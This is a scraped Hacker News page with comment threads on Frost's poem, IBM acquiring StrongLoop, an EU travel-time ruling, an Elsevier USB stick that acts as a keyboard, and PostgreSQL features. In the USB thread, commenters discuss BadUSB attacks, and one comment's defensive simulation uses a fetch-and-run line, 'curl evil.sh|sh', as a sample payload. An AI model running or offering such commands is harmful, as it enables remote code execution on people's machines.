Another similar example of misunderstanding well-known lines from literature is Shakespeare's "Now is the winter of our discontent..", which everyone quotes meaning we are in dark times...

Except it is the opposite - "Now is the winter of our discontent made glorious summer by this Son of York.." is the full line.

kendallpark 2 days ago 1 reply      
YES. I love the fact that someone has written about this.

I remember reading the full poem in high school and we were like, "That's... not the poem I thought it was."

werber 2 days ago 1 reply      
American nihilism is so often mistaken for something else
code_sterling 2 days ago 0 replies      
We spent a week discussing the possible meanings in college, and each was as valid as any other interpretation. This one was mentioned, but it was clear that none was more valid than the rest. You can't get a poem wrong, just like you can't interpret a painting wrong. An artist will be inspired to create, but what that means to the observer is personal, between them and the work.
Randgalt 2 days ago 2 replies      
Why should I believe David Orr? His argument is slim and I disagree with his conclusion. I read the poem again after reading Orr's article and it has the same meaning as it always has for me: go your own way and it will make all the difference. We will never know Frost's true intentions and, frankly, it doesn't matter. The words are the words regardless of what he intended.
bastijn 2 days ago 1 reply      
And here I am. At the end of a comment feed with many opinions about a poem everybody knows. Wondering if I should have known this poem before I read it today for the first time. Or if I could wave it away as just a USA thing, written by an American who falsely claims everybody outside the US also knows the poem. Pondering: which road did I take?
musesum 2 days ago 0 replies      
This or that? I would bet: either way, one regret.

Until now, this thought will vet a better look.

The past is done; the future not set.

Just keep on going, and watch your step.

giltleaf 2 days ago 1 reply      
The whole argument of the article establishes a false dichotomy. While I'm sure there are some people who can play the role both of the sheep and the literary insiders (as in the author's description), I'm sure most people, like the author, fall somewhere in the middle with their interpretation.
jmount 2 days ago 0 replies      
It is like they started the essay before they knew they could actually come to a coherent point.
markbnj 1 day ago 0 replies      
If art has a downside, it may be in the fact that there is always some very smart person at hand to analyze it for you and explain why you don't understand it.
undershirt 2 days ago 0 replies      
looks like the annotations on genius have this interpretation as well: http://genius.com/46404
vijucat 1 day ago 0 replies      
Two roads diverged in a wood, and I took the one that was less popular on Google

That was not a smart move

(With apologies to Frost fans).

What the IBM Acquisition of StrongLoop Means for the Node.js Community strongloop.com
244 points by ijroth  3 days ago   126 comments top 29
rynop 3 days ago 2 replies      
former IBM dev here (6 years in different areas). I hope they let you work on an island and don't force you to use their tooling/approved list of open source software.

IBM has long embraced the OSS community (I loved LTC), but the process to release/use anything OSS was not good (to put it nicely) and was one of the many reasons I left.

I worked on a project that was on an island, and while it was more efficient than normal IBM dev, it was still 10x slower, with tons more red tape, than what was required to make a competitive product (and stay competitive). IBM is big and ultimately has to protect itself - IMO that gets in the way of making a good/competitive product.

I like what StrongLoop does for the node community, and I do indeed hope you are successful and nothing changes. But to be honest I am very skeptical.

tracker1 3 days ago 0 replies      
As much as I fear this will drag StrongLoop, I feel that this is an excellent fit. StrongLoop has been focused on building "Enterprise" tools and modules around node, as well as working on whitelisting/reviewing various modules... This is a good fit for IBM and their clients who are inclined to also want to have "approved" or "certified" modules to be able to use separately from the rest of npm.

As much as I like the power/openness of npm, a lot of corporate environments move more slowly... modules need to be cleared by legal and usually limited to specific versions. Having more resources to do this is a good thing and can only help people who are working for financial institutions (as an example).

mbesto 3 days ago 5 replies      
> And its not just Node.js. Maybe you havent looked at what IBM is doing with open source lately. I was surprised when I dug in. For example, did you know they are leading contributors to:

Linux, OpenStack, Cloud Foundry, Docker, plus many Apache projects like Spark, Cordova and Hadoop, and of course, Node

They are? (keyword => "leading")



I find this claim dubious. Maybe I'm not digging hard enough.

mbubb 3 days ago 2 replies      
From the customer side - I dealt with Netezza and Softlayer before and after the IBM acquisition. In both cases, an almost palpable drain in support and intelligence. I hate to say it like that, as I know that there are brilliant folks in IBM (Watson, etc.)

Softlayer and Netezza in different ways were smart, nimble and fearless companies. You had real relationships with the engineers. I got to know Netezza folks in Massachusetts, Poland and Australia - some of the smartest folks I've met. They shared scripts and passionate expertise.

IBM took it over and the bureaucracy set in. The term "TAM" brings tears of rage to my eyes... Opening a support ticket is about as hard as applying for a mortgage online. And they want to have these endless conference calls with 7 or 8 folks from their side. And nothing gets done.

I am embarrassed about the way I have acted on these calls. I have called folks out-and-out liars. I have screamed at and bashed conference phones.

Maybe it would have been better if I hadn't known the Netezza folks - they were good.

And Softlayer...

I used to be able to call a guy down in Texas and, after a 20 minute phone call, have a cluster of servers ordered. Once did a hadoop cluster this way. Go off and have lunch, come back, and the servers would be ready by the afternoon.

And now: 2 major outages in the past 2 months. No communication - in both cases entirely their fault. Power failure and network misconfig causing an arp storm. Ignored for hours while we submitted tickets and called support... Nightmare.

And an absurd situation where their security dept threatened us with taking an haproxy server offline due to a clean-mx false positive - even after the tireless guy running clean-mx emailed to that effect...

It became apparent in the discussions following this event that the TAM and sales support which has had our account for years, knew nothing about our business.

Just horrible bureaucracy and bad service.

So I have had really negative experiences with 2 IBM acquired companies. Hopefully it will be better for StrongLoop.

For anyone affected - watch for the good folks shedding off.

funkysquid 3 days ago 1 reply      
If you're trying to relieve fears, the first paragraph does not help.

"IBM has identified Node.js as an important part of the future of enterprise middleware and StrongLoop's technology and expertise as pivotal to their strategy to help companies fully unlock the value of their existing IT investments and legacy data with APIs."

osullivj 3 days ago 5 replies      
I used to work with an old IBMer who used to say "it's no accident that IBM nearly collapsed at the same time as the Soviet Union did". Lou Gerstner famously rescued IBM from oblivion by turning it into a consultancy led company, and moving the focus away from mainframes. This is just a case of IBM snaffling up the latest cool thing so they can sell consulting services.
oneweekwonder 3 days ago 0 replies      
Recently I got heavily into node-red[0] after playing with a ti sensortag[1], and I'm really amazed at what it can do, and that it is open source and actively used by IBM in bluemix.

Now they acquired another heavy weight in the js world, I wonder what is their next step.

On a side note, to the audience: have you looked at node-red, what do you think of it?

[0]: http://nodered.org/

[1]: http://www.ti.com/sensortag

ps. if you run node-red locally, note that by default it is insecure; you need to set up the config. But really, it is a must try!
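For anyone trying it: Node-RED's editor can be locked down via `adminAuth` in its `settings.js`. This is only a sketch; the username and bcrypt hash below are placeholders, and the exact options are documented in Node-RED's security docs:

```javascript
// settings.js -- sketch of locking down the Node-RED editor.
// Username and hash are placeholders; generate a real bcrypt hash
// as described in the Node-RED "Securing Node-RED" documentation.
module.exports = {
    adminAuth: {
        type: "credentials",
        users: [{
            username: "admin",
            password: "$2a$08$REPLACE_WITH_A_REAL_BCRYPT_HASH",
            permissions: "*"
        }]
    }
};
```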

OldSchoolJohnny 3 days ago 1 reply      
IBM recently bought out Softlayer hosting and support went from great to glacially slow and all but uncaring in about 28 seconds.
rogerthis 3 days ago 2 replies      
Once I worked in a project which IBM was also involved. And everything in IBM related to that project was slow, very slow.
aikah 3 days ago 0 replies      
Congrats , I know nothing about "modern" IBM but it seems like they are trying interesting things with Bluemix. Let's see what happens next.
athenot 3 days ago 0 replies      
This announcement fits alongside Node.js 4.0's release, which contains a commitment to an 18-month roadmap, in giving Node.js greater maturity.

As much as I like to think I have chosen Node.js purely for its merits, having a wide community who adopts a platform brings a few perks:

- Hiring developers requires less of a gamble on their part. Elixir looks very promising and probably has a lot of advantages over Node.js thanks to its Erlang foundation, but it makes it harder to assemble a team. I hope this changes, as I wish the Erlang/Elixir folks all the best.

- There is a great amount of wealth contained in the package repository NPM. Before Node.js, this was a great strength of Perl's CPAN (and TeX' CTAN before that).

- Having large organizations adopt a platform will eventually increase OSS contributions.

I could be mistaken, but I don't see Node.js following the bureaucratic path of Java's JSRs if it continues to adopt a lean and mean approach akin to UNIX tools (do 1 thing well).

cdnsteve 3 days ago 1 reply      
If anything this is a strong validation of Node.js in the enterprise space. This is actually good news for anyone working within the enterprise trying to use a different technology set. It makes selling Node to a CTO a bit easier (even if you choose not to use StrongLoop).
mkozlows 3 days ago 0 replies      
I realize this blog post is full of optimistic "nothing will change!" statements, but that doesn't seem super-IBM-like.
kordless 3 days ago 1 reply      
Congratulations Issac! Happy for you and the team.
Aldo_MX 3 days ago 1 reply      
If IBM screws ExpressJS up (wishfully not), Hapi[1] is a good alternative.


codingdave 3 days ago 0 replies      
It is hard to say what this means at this stage...

IBM develops products that it acquires based on where IBM needs the product to go. Sometimes that matches where the user community wants it to go, sometimes it does not. But they will put resources behind it, and it will change - we just need to give it time to see what direction that change takes things.

ramigb 3 days ago 1 reply      
Just a question -might be dumb- is the merger of io.js and node.js which happened a couple of months ago related to this news in any way? Anyway, IMHO this is good news and I hope it will make node.js much better; who knows, maybe replace V8 with something even better.
amelius 3 days ago 2 replies      
What node.js needs is a better way to manage packages. Right now, upgrading can fail with no way to roll back. Also, reproducibility is missing. E.g., it is not easy to download sources and deploy those exact same sources on different machines.
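For what it's worth, npm does have a partial answer to the reproducibility half of this: `npm shrinkwrap`, which writes an `npm-shrinkwrap.json` pinning the exact resolved version of every dependency, so `npm install` on another machine fetches the same tree. A sketch of what the generated file looks like (the package name and versions are illustrative, not from the comment):

```json
{
  "name": "my-app",
  "version": "1.0.0",
  "dependencies": {
    "express": {
      "version": "4.13.3",
      "from": "express@^4.13.0",
      "resolved": "https://registry.npmjs.org/express/-/express-4.13.3.tgz"
    }
  }
}
```

Committing this file to source control gets you most of the way to reproducible deploys, though it doesn't address rolling back a failed upgrade.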
potch 3 days ago 0 replies      
I imagine it doesn't mean much beyond some more b2b uses of Node. Node has its own independent governance and nothing about this acquisition changes that.
mhd 3 days ago 0 replies      
Well, at least it's not Oracle
ilurkedhere 3 days ago 0 replies      
IBM Nodesphere.
jacques_chester 3 days ago 0 replies      
> Making sure that Node.js is a first class citizen on Softlayer and BlueMix

BlueMix is a Cloud Foundry installation. Is there a separate BlueMix-specific thing that is distinct from the Node.js buildpack?[0]

[0] https://github.com/cloudfoundry/nodejs-buildpack

curiousjorge 3 days ago 1 reply      
so how much was it acquired for?
wslh 3 days ago 2 replies      
Sorry for the joke but how many callbacks did they need to make this transaction?
atorralb 3 days ago 1 reply      
geniium 3 days ago 0 replies      
frandroid 3 days ago 0 replies      
meesles 3 days ago 2 replies      
Travelling to work 'is work', European court rules bbc.com
230 points by wj  3 days ago   133 comments top 18
furyg3 2 days ago 4 replies      
In the US, I worked for a consulting group in the bay area (Fremont). There was a big discussion about whether or not we were on the clock while driving to client sites, because some people wanted to live in Tracy and other people closer to the office, and the client sites were all over the place. So how to calculate this?

One way to do it was just to say you have to show up to the Fremont office before going anywhere ('fixed office'), but this can be wasteful for everyone, since the client site can be in the opposite direction of the office. The final agreement was that the time it would have taken you to get to/from the office was your own time, and from then on you're on the clock and paid.

So if you live next to the office and get sent somewhere, your whole commute time to that place is paid. If you want to live in Tracy and drive an hour into work, that's ok, but your commute to the client site is only paid if it's longer than an hour or so. If you had to go to two client sites in a single day, the time between the client sites was always paid.

Nobody really had any idea if this was legal or not, but all of the consultants agreed it was very fair.
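The agreement described above reduces to a small calculation: travel between client sites is always paid, and home-to-site travel is paid only for the portion exceeding your normal office commute. A rough sketch (function and variable names are mine, not from the comment):

```javascript
// Sketch of the consulting group's travel-pay rule described above.
// officeCommute: minutes from home to the regular office.
// legs: array of [minutes, betweenSites] pairs for the day's travel;
//       home<->site legs have betweenSites=false, site-to-site legs true.
function paidTravelMinutes(officeCommute, legs) {
  let paid = 0;
  for (const [minutes, betweenSites] of legs) {
    if (betweenSites) {
      paid += minutes;                              // site-to-site travel is always on the clock
    } else {
      paid += Math.max(0, minutes - officeCommute); // only the excess over the normal commute
    }
  }
  return paid;
}

// 60-minute normal commute: 90 min to a client, 30 min between
// two sites, 50 min drive home.
console.log(paidTravelMinutes(60, [[90, false], [30, true], [50, false]])); // 60
```

So living next to the office makes nearly all client travel paid, while a long voluntary commute eats into it, which is why the consultants considered it fair.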

roel_v 2 days ago 1 reply      
The article's headline is not in line with the ruling of course, but it's not even what most people in this thread are assuming. The ECJ's rulings are to be interpreted very narrowly. In this specific circumstance, the company closed an office after which people had longer commutes. So this ruling in no shape or form means that people who took a job with a certain commute now all of a sudden will be paid for that commute! It's only the people where, through the choice of the employer, the commute has become longer, who can use this as a precedent. Precedent case facts matter a lot!
lfowles 3 days ago 5 replies      
> Time spent travelling to and from first and last appointments by workers without a fixed office should be regarded as working time, the European Court of Justice has ruled

Oh well.

xacaxulu 2 days ago 2 replies      
The best thing about being a consultant and running your own business is that every expense or bit of time spent around work is considered WORK. As a basic employee in the US, you never get these sorts of benefits and write-offs. When I hear of people commuting 1 hour to work, that means they work 50 hours a week (assuming 40 hours at the office). Their hourly rate is effectively much lower.
century19 2 days ago 5 replies      
I guess this should also apply to work trips then? I knew one guy who would only book a flight from 9am on Monday mornings, rather than being pressured into Sunday night or silly-AM Monday morning.

When I told other people who travel for work about this, the response was pretty much that he should be fired.

Retra 3 days ago 1 reply      
Makes sense; nobody is going to tell you it's not your job to get somewhere you are being paid to be.
zhte415 2 days ago 1 reply      
Tangential, but related to the headline:

In China, if an employee has an accident on the way to work, the employer is required to provide care and compensation (not liability compensation, just regular employee compensation) just as if the accident had happened in the workplace.

This ruling was made in 2013.

DanBC 3 days ago 3 replies      
I'm a bit confused how they claim this has no effect on UK minimum wage workers.

If that travel time counts towards my 48 hours max working hours why doesn't it also count as time I should be paid for?

jksmith 2 days ago 1 reply      
Start the autonomous car, let it send a "punch the clock" event to work.

Status: 1) Remote, 2) In office, 3) Working, en route?

Additionally, only accept meetings when status is 3).

simonjgreen 1 day ago 0 replies      
This is for people without fixed offices, e.g. travelling salespeople. This is not saying your daily commute is work. The title of this submission is very misleading.
conceit 1 day ago 0 replies      
My place of work is fixed, but it's not an office. So, does this apply to me? :
rockdoe 2 days ago 5 replies      
Does this apply to consultants going to a customer (where they may be for a longer period of time)?
leovonl 2 days ago 0 replies      
Clickbait title.
bullen 2 days ago 1 reply      
supriyarao 2 days ago 1 reply      
D_Alex 2 days ago 1 reply      
wavefunction 3 days ago 1 reply      
Frozenlock 2 days ago 3 replies      
Elsevier, that just freaked me out swaldman.dreamwidth.org
282 points by phreeza  2 days ago   137 comments top 24
adrianN 2 days ago 2 replies      
Plugging things into your USB port has been known to be a dangerous activity for quite some time.[1,2] It's surprising that someone at Elsevier thought it would be a good idea to use these techniques, though.

[1] https://srlabs.de/badusb

[2] https://media.blackhat.com/bh-dc-11/Larimer/BlackHat_DC_2011...

jordigh 2 days ago 6 replies      
Can we have a usb condom for this situation? The actual product called "usb condom" is about charging phones and blocks all the data pins on the usb cable. Can we have one that will only allow devices to connect as mass storage devices, or is this at odds with the usb protocol?
jimrandomh 2 days ago 4 replies      
This is an operating system problem. When a new device is plugged in and claims to be a keyboard, it should lock the screen and not be accepted as input until it has typed the user's login password.
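
The proposal above can be sketched as a tiny state machine (purely a simulation — no real OS hooks; the class name, password, and payload string are all invented for illustration): input from a newly attached "keyboard" is discarded until the device proves itself by typing the user's password.

```python
# Simulated gate for a newly attached keyboard: swallow all keystrokes
# until the device has typed the user's password, then pass input through.
class KeyboardGate:
    def __init__(self, password):
        self.password = password
        self.trusted = False
        self.typed = ""

    def key(self, ch):
        """Return the character if the device is trusted, else buffer it."""
        if self.trusted:
            return ch
        self.typed += ch
        if self.typed.endswith(self.password):
            self.trusted = True  # the device proved a human is behind it
        return None  # swallow input from untrusted devices

gate = KeyboardGate("hunter2")
# A BadUSB device blurts a payload the moment it's plugged in; nothing leaks:
leaked = [c for c in "curl evil.sh|sh" if gate.key(c)]
print(leaked)  # []
# The user types their password, unlocking the device:
for c in "hunter2":
    gate.key(c)
print(gate.key("x"))  # x
```

A real implementation would of course have to live in the input stack, below anything a rogue HID device can reach.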
brillenfux 2 days ago 2 replies      
So will this USB firmware situation eventually be solved in some newer version or are we all just silently ignoring this?

Because this makes USB an absolute NO in some environments (and for quite a while now).

It would be nice if we could use USB again at some point

jimrandomh 2 days ago 1 reply      
Distributing a USB device that pretends to be a keyboard and types commands is somewhere between faux pas and criminal hacking attempt. Even if the intent was innocent, it has to be investigated like a breakin to be sure. In this case it sounds like it was closer to the faux pas side.
upofadown 2 days ago 1 reply      
I suspect that a legal approach might work here. Elsevier was being deliberately misleading and was deliberately making a computer do something that the owner of that computer had not authorized. There must be some computer crime statute they could be charged under.
jgrahamc 2 days ago 0 replies      
I made a thing like this for the office with an Arduino Trinket: https://github.com/jgrahamc/missile_command
sp332 2 days ago 1 reply      
I wonder if it's hard-coded or if you could make it do something else. Hak5 has been selling programmable versions of these for a while. http://hakshop.myshopify.com/collections/usb-rubber-ducky/pr...
ozzmotik 2 days ago 1 reply      
not sure if this has been mentioned, but this sounds like the Rubber Ducky


just contributing something of interest.

almightysmudge 2 days ago 3 replies      
Stuns me that someone thought this would be a good idea.

Oh hey my free USB device helpfully made me go to a webpage without warning and without permission, these guys are wizards and deserve my custom.

px43 2 days ago 0 replies      
Ancient. The latest fun project enabling this sort of thing is Samy's USBDriveby project:


And yes, you totally can detect operating system, bypass HID protections, and deliver custom weaponized payloads in the form of scripts catted into the command prompt.

Someone 2 days ago 0 replies      
Anybody know whether https://www.gdatasoftware.com/en-usb-keyboard-guard works well and can be trusted?
j_s 2 days ago 0 replies      
What is the url?

Seems like a juicy target for a hack on the server side.

SomeoneWeird 1 day ago 0 replies      
There's an off-the-shelf USB device that you can buy, called a Teensy[1], that is programmable and automatically registers itself as a USB HID. Very similar to what is described here.

[1] https://www.pjrc.com/teensy/

kazagistar 2 days ago 1 reply      
My employer blocks USB memory sticks... but still permits keyboards and mice for convenience. I am not sure what they hope to accomplish.
rblatz 1 day ago 0 replies      
Hyundai did this years ago in 2011 when I bought my car. They sent me a USB key that emulated a keyboard. It opened up the Hyundai registration page, and may have typed my VIN in for me. This isn't new at all.
moyix 2 days ago 0 replies      
Apparently some of these are reprogrammable by just rewriting the onboard I2C EEPROM:


Could be a fun weekend project.

ggchappell 2 days ago 2 replies      
I don't worry much about inserting wacky storage devices, as I run Linux, and I don't have any kind of auto-run enabled.

But this would still work on my machine, right? (I mean that the key combo would be entered; it might not actually bring up the web page, depending on my setup.)

jonknee 2 days ago 5 replies      
And that's a feature, not a bug. I have a YubiKey and it does a similar thing, but for good not evil. It would be tricky for an OS to not register keyboards (after all, how would you vouch for an input device without using an input device?).

tl;dr don't plug unknown things into your computer.

robryk 2 days ago 0 replies      
I wonder if it is possible to fingerprint USB keyboards of same make (with same dummy serial number) to tell them apart. For example one could try to exploit frequency deviations of the crystal oscillator in the keyboard.
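
A toy version of this idea, with everything simulated (the nominal polling period, crystal skew in ppm, and jitter figures are all invented for illustration): two "identical" keyboards whose crystals differ by a few hundred ppm produce statistically distinguishable inter-report intervals once you average enough of them.

```python
import random
import statistics

random.seed(0)

def report_intervals(skew_ppm, n=2000, nominal_ms=8.0, jitter_ms=0.01):
    # A skewed crystal stretches (or shrinks) every HID report interval
    # by the same tiny factor; jitter models measurement noise.
    period = nominal_ms * (1 + skew_ppm / 1e6)
    return [random.gauss(period, jitter_ms) for _ in range(n)]

kbd_a = statistics.mean(report_intervals(skew_ppm=0))
kbd_b = statistics.mean(report_intervals(skew_ppm=400))

# Averaging 2000 intervals shrinks the noise enough that a 400 ppm
# difference (about 3 µs on an 8 ms period) stands out.
print(kbd_b > kbd_a)  # True
```

Measuring real hardware to microsecond precision through the USB stack is the hard part; the statistics are the easy part.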
s_kilk 2 days ago 0 replies      
A few years back a colleague (at the time) went to a MongoDB event where they pulled this same stunt, handing out usb drives that would act like a keyboard and hijack the machine.

Both clever and reprehensible.

conceit 1 day ago 0 replies      
is this done to boost the called site's search rank?
javajosh 1 day ago 0 replies      
It's not an attack unless you write to the hard-drive. This is more of a nuisance, and a bad move, and troubling for what it could be, but the thing itself looks harmless.
PostgreSQL Magic project-a.com
231 points by websec  2 days ago   63 comments top 7
timonv 2 days ago 5 replies      
As a fellow Postgres amateur wizard, I love the positive attention that Postgres seems to be getting more and more, and some half-baked databases less and less (unless you actually need map-reduce, of course. You probably don't. /trollface)

What I miss in this article, though, and where I think Postgres shines majorly compared to other relational DBs, are window functions.

It allows you to apply a partition to a set. You can do some great wizardly magic with this, like 'give me each row matching this and that, which matches the last occurrence of a given column'.

Edit: WITH clauses (CTEs) are great for avoiding a lot of nesting with subqueries and/or reusing subqueries throughout the main query. They have added functionality for recursion, but I suppose that unless you do some kind of tree traversal on big data sets, the benefits of that are so-so, readability and all that.

Edit2: I had to double-check this; I never use custom types. Using UNNEST() ARRAY[] on a custom type is superfluous. Just use ROW().

rosser 2 days ago 2 replies      
Quibble: the "now()" function doesn't return the time of statement start; it returns the time of transaction start.

    $ psql -q
    rosser=# begin;
    rosser=# select now();
                  now
    -------------------------------
     2015-09-11 02:28:54.262142-07
    (1 row)
    rosser=# select now();
                  now
    -------------------------------
     2015-09-11 02:28:54.262142-07
    (1 row)

whistlerbrk 2 days ago 0 replies      
So many amazing features that are incredibly relevant to modern web development. I've switched over a personal project from MySQL to PG recently and this time I'm not looking back.

On 9.4 I have the HSTORE and JSONB types as well as range types which are incredibly useful. If you have a solid language library wrapper for PG you can spend far less time mangling data from one format to the next and just get to work. I love it.

zrail 2 days ago 0 replies      
I have seen magic done with custom types and aggregates. For example, I know of projects with run-length-encoded bitsets and custom aggregates for doing set operations and counts, sort of like Redis' bitset commands but built into PG. This is a massive space optimization, because otherwise you'd just have a join table with zillions of tiny rows.
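
The space trick described here is easy to see in miniature. This is a toy sketch (the encoding format and function names are invented, and a real implementation would live in a Postgres C extension or custom aggregate): store (value, run-length) pairs instead of one row per bit, and answer a count query straight off the encoding.

```python
def rle_encode(bits):
    """Collapse a bit sequence into [value, run_length] pairs."""
    runs = []
    for b in bits:
        if runs and runs[-1][0] == b:
            runs[-1][1] += 1
        else:
            runs.append([b, 1])
    return runs

def popcount(runs):
    """Count set bits without ever expanding the runs."""
    return sum(length for value, length in runs if value)

bits = [1, 1, 1, 0, 0, 1, 0, 0, 0, 0]
runs = rle_encode(bits)
print(runs)            # [[1, 3], [0, 2], [1, 1], [0, 4]]
print(popcount(runs))  # 4
```

For sparse or bursty bitsets, the runs stay tiny no matter how many "rows" they represent — which is exactly why this beats a join table with zillions of tiny rows.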
mhd 2 days ago 7 replies      
I have to admit that I'm still not quite sure about arrays in relational databases. Don't get me wrong, I use them all the time, but it kinda feels like when you've got tables that you just know could be normalized more thoroughly.

Also: If someone has a good version-control wrapper for stored procedures, that would be swell. And while I'm doing the wishful thinking shtick, maybe a Coffeescript-like preprocessor and a good linter?

sigma2015 2 days ago 4 replies      
What tool do you use for visualizing table relationships (foreign key constraints f.x.) in PostgreSQL?
dsugarman 2 days ago 0 replies      
The best part of this for me was the batch updates. I am a little confused at the need for a user-defined type that is a copy of the schema of the table. Wouldn't it be better to use:


That way you wouldn't need to maintain a table and a type with the exact same schema, no?

Data is not an asset, its a liability richie.fi
214 points by markonen  3 days ago   108 comments top 28
cwp 3 days ago 5 replies      
He's on to something here, but I think the asset/liability duality isn't a matter of your point of view. Code really is a liability, even from the high-level view in the boardroom. The asset is functionality. If you can get more functionality with less code, you improve your balance sheet.

By analogy, data is also a liability. The asset is insight.

zeveb 3 days ago 3 replies      
The reason to collect everything (or rather, more things than you think you'll need to answer the questions you think you'll need to answer) is that you could be wrong about what data are required to answer the questions you've identified, and that you could be wrong about which questions you will care about.

And historical data can be extremely useful, e.g. when looking at seasonal or cyclical trends (woe betide the grocer who doesn't stock up on turkeys in mid November, which means woe betide the grocer who doesn't order turkeys in the summer).

Yes, he's absolutely right that data management and privacy impose a cost: the cost of storing a GB of data is more than S3's 10. It takes a human being to make a judgement call about whether this data is likely to be worth its overall cost and risk. That's why managers and other decision-makers get paid what they get paid. 'Data is a liability' is a nice soundbite, but it doesn't capture the full reality; one can't manage to soundbites.

colin_mccabe 3 days ago 1 reply      
This article is highly misleading. Sure, certain kinds of data (like credit card data or medical data) can be a liability if not properly managed. If you are working in one of those industries you already know that (although arguably many financial and medical companies underestimate the risks).

In contrast, data about what users have clicked, comments on an online forum, or who has friended who on your social media site is not a liability. In many cases this data is already public. Even in cases where it's not, it is usually incredibly boring for any hacker to steal, like what web pages John Doe has clicked on in the last 10 minutes. Hackers are going to go after stuff like social security numbers or credit card numbers, not data about the average length of time people spent looking at Pepsi Inc. web page layout A versus web page layout B.

The argument that you should only store "the data that you need" is a circular one. How do you know what data you need? Well, you run an analysis. How do you run an analysis? Using the data you have. Short-sighted policies like throwing away historical data, as the article recommends, effectively blind you to long-term trends.

tomlock 2 days ago 0 replies      
>>Think this way for a while, and you notice a key factor: old data usually isn't very interesting. You'll be much more interested in what your users are doing right now than what they were doing a year ago. Sure, spotting trends in historical data might be cool, but in all likelihood it isn't actionable. Today's data is.

Uhhhh, really? There have been a lot of times in my past where, as an analyst, I wished I had a bunch of historical data to measure the seasonality of trends. Am I the only one who baulks at this comment? Is this a startup-oriented perspective?

roymurdock 3 days ago 0 replies      
It depends on what industry you're in.

So JPMorgan took a bit of a reputation hit when hackers compromised the data of 83m of the company's clients. [1] The financial repercussions were minimal, if there even were any to begin with. You can bet they still collect and store all the data they can. They don't really care, and customers don't really care all that much either.

On the other hand, we have medical data, which is essential for pharmaceutical and academic research but would be very, very harmful in the wrong hands. A non-compliant company will get smacked with heavy fines under HIPAA for not safeguarding data in a strict, standardized manner.

Until government regulation makes data breaches substantially costly for Company X (Target, Adobe, LastPass, Department of Personnel Management, etc.), Company X will continue to gather as much data as possible.

It's an asset with unbounded upside (who knows what great economic engine data might fuel in 5-10 years) and no financial downside because it carries no legal risk, and very minimal storage costs.

[1] http://dealbook.nytimes.com/2014/12/22/entry-point-of-jpmorg...

pisipisipisi 3 days ago 1 reply      
Cultural difference: in the US, your customer DB is an asset like anything else. In the EU, your customer database is a liability.
mizzao 3 days ago 1 reply      
Another way of looking at the article is that it's more important to have the right data than just having lots of data. So it's very important to think about the questions that one would want to answer and design data collection to capture the answers, rather than just going ahead and storing everything in a brute force way.
ohitsdom 3 days ago 1 reply      
A $125 billion market for big data solutions is NOT a sign that data is a liability. What is the value of that data?

I'm also skeptical of the compliance/privacy argument. If you're collecting any data at all, it's a potential liability. The volume of the data doesn't change the risk level much.

dredmorbius 3 days ago 0 replies      
I'm quite happy to see others starting to recognize this. It's a problem, as someone who's dealt with "big data" since the early 1990s, that I've been quite well aware of for several decades.

An exceptionally peculiar aspect of digital data is that, while it may remain in the boxes and cages provided for it, it's got a notable tendency to find itself liberated. Often without warning, and not detected for days, weeks, months, or longer, afterward (as in this case). In the real world we've got friction, especially associated with data processing and transfer. In digital form, far less so. Sometimes friction is good.

What you almost always want to do is to roll data up to non-individualised aggregates as soon as practically possible. The rest is just dry powder waiting for a spark.


mmaunder 3 days ago 0 replies      
Totally agree. Was going to add that an expanding schema is a liability but that seems self evident with the comments about code expansion.

If you've ever built a very busy application you know the truth of this. At first the massive access to data you have seems like a gift and you'll log it all "just in case". You might even brag about the volumes of data you have and speculate about their value to investors and internally. But eventually you realize the risk and cost and cost of managing the risk.

tarr11 3 days ago 1 reply      
Private customer data often comes with a liability, but not for the reasons that OP states. The liability is that companies have an ongoing obligation to their customers to protect their private data. However, a lot of data does not carry this liability. If it got published to the world, it wouldn't matter.

This article portrays a common misunderstanding of the accounting terms liability and asset. Just because something has a cost to maintain, it does not make it a liability.

Code is an asset. Data is an asset. Businesses do not value assets at their cost, as the article represents, but in their future economic value.


"Things that are resources owned by a company and which have future economic value that can be measured and can be expressed in dollars. Examples include cash, investments, accounts receivable, inventory, supplies, land, buildings, equipment, and vehicles."


"Obligations of a company or organization. Amounts owed to lenders and suppliers. Liabilities often have the word "payable" in the account title. Liabilities also include amounts received in advance for a future sale or for a future service to be performed."

kainosnoema 3 days ago 0 replies      
This is one reason we decided at Cotap to purge messages after 14 days by default, and only keep them longer if requested (https://cotap.com/blog/customizable-data-retention-for-busin...). Contrary to what one might expect, most users embraced the change.
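
A default retention policy like that boils down to one periodic delete. A minimal sketch, assuming a simple message table (schema, column names, and the fixed "current time" are all invented; Cotap's actual implementation is surely more involved):

```python
import sqlite3

RETENTION_SECONDS = 14 * 24 * 3600
now = 1_000_000_000  # a fixed "current time" keeps the example deterministic

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE messages (body TEXT, created_at INTEGER)")
conn.executemany("INSERT INTO messages VALUES (?, ?)", [
    ("old", now - RETENTION_SECONDS - 1),  # just past the 14-day window
    ("new", now - 60),                     # one minute old
])

# The purge job: anything older than the retention window is gone.
conn.execute("DELETE FROM messages WHERE created_at < ?",
             (now - RETENTION_SECONDS,))
remaining = [r[0] for r in conn.execute("SELECT body FROM messages")]
print(remaining)  # ['new']
```

The hard part isn't the delete — it's making sure backups, replicas, and logs honor the same window.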
Tloewald 3 days ago 0 replies      
Somewhat in this vein:

Years ago I worked at a large advertising network that was concerned about fraudulent impressions, e.g. ads placed "below the fold", hidden behind other elements, or otherwise generating impressions that weren't real.

I suggested we could build a small piece of supplemental ad code that would load alongside one of our ads in a web page and "look around" to see where the ads were placed and so on.

The idea was rejected because it would create too much data. I argued that we could trigger the fraud-detection code once per n impressions, with n being 100 or 1000, and still identify fraudulent sites with statistical certainty (our problem would be false negatives), but they couldn't wrap their heads around merely sampling enough data to answer a question rather than collecting ALL the data, so the idea was rejected.

Of course it's also highly likely that they didn't actually want to detect fraud.
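
The sampling argument checks out numerically. A toy simulation (the fraud rate, traffic volume, and sampling interval are all invented): instrument only 1 in 100 impressions and the estimated fraud rate still lands close to the true one.

```python
import random

random.seed(42)
TRUE_FRAUD_RATE = 0.30   # fraction of a site's impressions that are fake
IMPRESSIONS = 100_000
N = 100                  # run the detection code once per N impressions

# Each sampled impression is fraudulent with the true rate.
sampled = [random.random() < TRUE_FRAUD_RATE
           for i in range(IMPRESSIONS) if i % N == 0]
estimate = sum(sampled) / len(sampled)
print(round(estimate, 2))  # close to 0.30
```

With 1000 samples the standard error is about sqrt(0.3 * 0.7 / 1000) ≈ 0.014, so a 30%-fraud site is unmistakable while storing 1% of the data.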

lighthawk 3 days ago 0 replies      
"Then you collect the data you need (and just the data you need) to answer those questions."

